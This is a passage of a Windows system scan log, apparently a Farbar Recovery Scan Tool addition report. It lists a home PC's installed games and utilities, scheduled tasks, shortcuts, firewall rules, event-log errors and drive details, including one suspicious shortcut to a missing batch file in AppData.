Microsoft Works Suite Add-in for Microsoft Word (HKLM-x32\...\{33BEE6F3-9987-4F98-A069-97A64EC8321A}) (Version: 7.0.0.0000 - Microsoft Corporation)
Mirror Magic (HKLM-x32\...\exent_764150) (Version:  - )
Mortimer Beckett Double Pack (HKLM-x32\...\d7390ee1a0664e5d7ee040b11c6c5052) (Version:  - )
Mozilla Firefox 50.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0.2 (x86 en-US)) (Version: 50.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0.2.6177 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Off the Record: Linden Shades Collector's Edition (HKLM-x32\...\BFG-Off the Record - Linden Shades Collector's Edition) (Version:  - )
Online Games Manager v1.50 (HKLM-x32\...\Online Games Manager) (Version: 1.50.4 - Real Networks, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.6904 - CyberLink Corp.) Hidden
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4204 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3003 - CyberLink Corp.) Hidden
Puzzle Solitaire (remove only) (HKLM-x32\...\Puzzle Solitaire) (Version:  - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6206 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30120 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3023 - CyberLink Corp.) Hidden
Romance of Rome (HKLM-x32\...\4e22301604a3a670489ec087182c3f06) (Version:  - )
RtVOsd (HKLM\...\{091A0130-A82F-4A6D-9C61-3BBBB3289030}) (Version: 1.0.6 - Realtek Semiconductor Corp.)
Scrabble v2.0 (HKLM-x32\...\Scrabble v2.0) (Version:  - )
Slingo Deluxe (HKLM-x32\...\Slingo Deluxe) (Version: 1.0.11 - funkitron)
Spin and Win (remove only) (HKLM-x32\...\Spin and Win) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.6.64 - Synaptics Incorporated)
Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 10.0 - Trend Micro Inc.)
Trend Micro Password Manager (HKLM\...\3A0FB4E3-2C0D-4572-A24D-67F1CAABDDP35_is1) (Version: 3.7.0.1100 - Trend Micro Inc.)
Trend Micro Titanium (Version: 10.0 - Trend Micro Inc.) Hidden
Unit Layers (HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Unit Layers) (Version: 9.0 - Unit Layers)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95 - WildTangent) Hidden
WeatherBug® (HKLM-x32\...\WeatherBug®) (Version: 10.0.5.29 - Earth Networks, Inc.)
Wedding Salon (HKLM-x32\...\ecf17be8f49bd825ea5bc167b3c3e6d3) (Version:  - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (x32 Version: 4.0.10.16 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.0.10.16 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Word Bird Supreme (HKLM-x32\...\9d7a5d47589c0698700923dd986fcfa3) (Version:  - )
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version:  - Yahoo Inc.)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {20E9FB50-D830-4C65-944B-35B95739ADE1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {2E942A7E-FA99-4DD3-BD9F-92E9AEDE3BA3} - System32\Tasks\ServicePlan => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {3E9FC981-8B08-4455-AE56-6D1AFEDDD25B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()
Task: {43C92693-EB45-4EAB-9194-65333F008151} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-26] (Google Inc.)
Task: {548B28FD-136A-485C-BD28-9BDF6807032D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {60462EB9-2F6D-47D8-9B7F-1254D9A8387D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-12] (Adobe Systems Incorporated)
Task: {637754C7-7447-4AC3-936D-4523EF69C19A} - System32\Tasks\HPCustParticipation HP Photosmart 7510 series => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPCustPartic.exe [2011-08-31] (Hewlett-Packard Co.)
Task: {6ED8EB46-0910-4360-9CAE-19E27455902B} - System32\Tasks\HPCeeScheduleForOwner => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {7FA7EA55-5648-4603-9A45-529DEBE3EA3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-08-23] (HP Inc.)
Task: {804BCEAE-303E-4887-8566-789AF9878FD3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-08-03] (HP Inc.)
Task: {93D805C2-029B-4887-9BF0-D07E575FB62D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-08-15] (HP Inc.)
Task: {C3107BB7-3615-46DF-8762-60FA1BFFC646} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {EA6AB54C-AD98-4079-8DC5-8AF42DF153E4} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
Task: {F3720C23-BEEA-49AF-B7D8-9E5993FBE08B} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2010-05-25] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForOwner.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk -> C:\Users\Owner\AppData\Local\767c1f6b\364acf2b.bat (No File)

ShortcutWithArgument: C:\Users\Owner\Desktop\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Villa Banana\Play Villa Banana.lnk -> C:\Remote Programs\Villa Banana\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=738050&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\The Chronicles of Emerland Solitaire\Play The Chronicles of Emerland Solitaire.lnk -> C:\Remote Programs\The Chronicles of Emerland Solitaire\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Solitaire Kingdom Supreme\Play Solitaire Kingdom Supreme.lnk -> C:\Remote Programs\Solitaire Kingdom Supreme\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=725950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Legends of Solitaire Curse of the Dragons\Play Legends of Solitaire Curse of the Dragons.lnk -> C:\Remote Programs\Legends of Solitaire Curse of the Dragons\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=807150&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games\Dream Day Wedding - Married in Manhatten\Play Dream Day Wedding - Married in Manhatten.lnk -> C:\Remote Programs\Dream Day Wedding - Married in Manhatten\GPlrLanc.exe (Exent Technologies Ltd.) -> -LOpCode 1 -shortcut hxxp://www.freeridegames.com/main/shortcut.jsp?theme=Home&AppId=628950&RunIndex=1&PrvId=143&AcID=&OpenShInIE=0&PrvDir=Default

==================== Loaded Modules (Whitelisted) ==============

2016-02-21 08:34 - 2015-07-16 13:31 - 00018944 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00049664 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll
2014-09-05 19:56 - 2013-11-13 14:08 - 00146736 ____N () C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
2016-02-21 08:34 - 2015-07-16 13:31 - 00089088 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll
2016-02-21 08:34 - 2015-07-16 13:31 - 00761856 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll
2016-02-21 08:30 - 2014-08-01 19:17 - 00048128 _____ () C:\Program Files\Trend Micro\TMIDS\boost_date_time-vc110-mt-1_49.dll
2016-02-21 08:30 - 2016-09-01 13:31 - 40970752 _____ () C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
2010-06-10 18:42 - 2010-06-10 18:42 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-09-28 03:35 - 2010-09-28 03:35 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll
2010-06-18 18:26 - 2010-06-18 18:26 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll
2015-12-15 13:38 - 2015-12-15 13:38 - 00326112 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2015-10-27 16:44 - 2015-10-27 16:44 - 00404952 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\ipm_service.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 45077376 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libcef.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2010-02-09 20:58 - 2010-02-09 20:58 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 01650560 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libglesv2.dll
2016-06-02 18:06 - 2016-06-02 18:06 - 00082304 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\trendmicro.com -> hxxps://pwm.trendmicro.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-11-30 15:10 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ECC83859-F826-4E60-8C70-2679218588B5}] => C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{2FD18DD4-08D1-44F4-90D1-0C71DB9B0B85}] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{CACE2A3F-94D0-4A90-9C85-DE45A5BB75A9}] => svchost.exe
FirewallRules: [{6E2A430E-41B8-4970-9896-E5137A06EF68}] => C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{A3A4B663-7DAA-4562-A680-C47CAC7A17FC}] => C:\Program Files (x86)\CyberLink\PowerDirector\PDR8.EXE
FirewallRules: [{AE3861D2-CD1F-47FF-9724-E3A282EA073E}] => C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{A8C797C8-01D0-4B39-A2E5-574546EEB978}] => C:\Program Files (x86)\Hewlett-Packard\MediaSmart\CinemaNow\CinemaNow.exe
FirewallRules: [{8F1ED23F-8124-47F8-BD9F-A386ACF70127}] => C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{C993DBB6-02E1-43C3-85E5-32CF3ACCA4C5}] => C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowShell.exe
FirewallRules: [{2BDDBF74-AC62-49DB-BB26-236F0777BDF0}] => C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{89DAFBC5-CE52-4EA8-B5F6-E4E11A7574D2}] => C:\Program Files\HP\HP Photosmart 7510 series\Bin\DeviceSetup.exe
FirewallRules: [{1589E52E-1E4D-4A40-98A8-B29A66DAAB59}] => C:\Program Files\HP\HP Photosmart 7510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [TCP Query User{F45D6C64-5311-4C97-94C4-415A65CA7E57}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [UDP Query User{2F6C9022-660B-40F7-92F1-7CA32B6A4B77}C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe] => C:\program files (x86)\hasbro interactive\scrabble v2.0\scrabble v2.0.exe
FirewallRules: [TCP Query User{C919D2B6-A863-4693-88C5-B6D935A25902}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{F017EC39-E28A-4239-A5D7-AD7A6E2D67DF}C:\windows\syswow64\dplaysvr.exe] => C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{12D1A36E-E588-471C-A733-0AAED90E0A96}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [UDP Query User{29FFD94E-99E7-473A-A2E0-FE6F191742A7}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [{95C62BB0-D859-4E2A-A64D-8D8BBA8713A8}] => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{A913A0C9-B9F1-41E5-9390-AEFE15BA282E}] => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{4CC961E5-0940-4383-A41A-33B1D705CA94}] => C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{27C90A35-DF5A-4E93-81EF-A588F39C847B}] => C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{4F12C549-3FEB-4BEB-84FF-242D4191D08B}] => C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{DF3D7CBC-116B-41C7-80CF-EDBF386A68ED}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{07751770-2A7C-4575-8FA9-97329195C28E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{807F2D7A-B2ED-429A-AE1E-B61DF684C77C}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4CD107E7-A2A0-4768-96A3-228E003EE820}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A20F1399-AB43-4ECC-A227-35DC9F054463}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

21-02-2016 09:37:25 Scheduled Checkpoint
28-02-2016 14:02:23 Scheduled Checkpoint
23-03-2016 18:16:58 Scheduled Checkpoint
25-11-2016 17:41:05 Installed HP Support Assistant
25-11-2016 18:46:00 Windows Modules Installer
26-11-2016 04:54:50 Windows Modules Installer
26-11-2016 04:56:47 Windows Modules Installer
26-11-2016 04:59:57 Windows Update
30-11-2016 15:09:48 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/01/2016 02:19:00 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (12/01/2016 09:11:18 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (12/01/2016 04:28:48 AM) (Source: Application Virtualization Client) (EventID: 6034) (User: )
Description: {tid=1B90}
Error ( 32 ) moving staged settings file ( Q:\140066.ENU\SoftGridUserSettings\S-1-5-21-2406275642-2542123288-3132197554-1000\settings.cp.temp )

Error: (11/30/2016 03:46:07 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/30/2016 03:10:03 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary X5XSEx_Pr143.

System Error:
The system cannot find the file specified.
.

Error: (11/30/2016 03:09:46 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.


Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {0bbdc0fc-82d5-4c77-8f4c-0686f2aa60f7}

Error: (11/29/2016 09:07:34 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 02:43:31 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 08:45:25 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 02:02:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.


System errors:
=============
Error: (12/01/2016 02:06:28 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (12/01/2016 08:58:52 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (12/01/2016 08:56:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (12/01/2016 08:56:32 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.

Error: (12/01/2016 02:35:45 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The backup browser is stopping.

Error: (12/01/2016 02:34:58 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (12/01/2016 02:30:55 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (11/30/2016 05:16:31 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/30/2016 03:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/30/2016 03:19:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.


==================== Memory info ===========================

Processor: AMD Athlon™ II P340 Dual-Core Processor
Percentage of memory in use: 59%
Total physical RAM: 2810.9 MB
Available physical RAM: 1148.86 MB
Total Virtual: 5620.01 MB
Available Virtual: 3086.27 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:281.48 GB) (Free:207.81 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.31 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 82337274)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
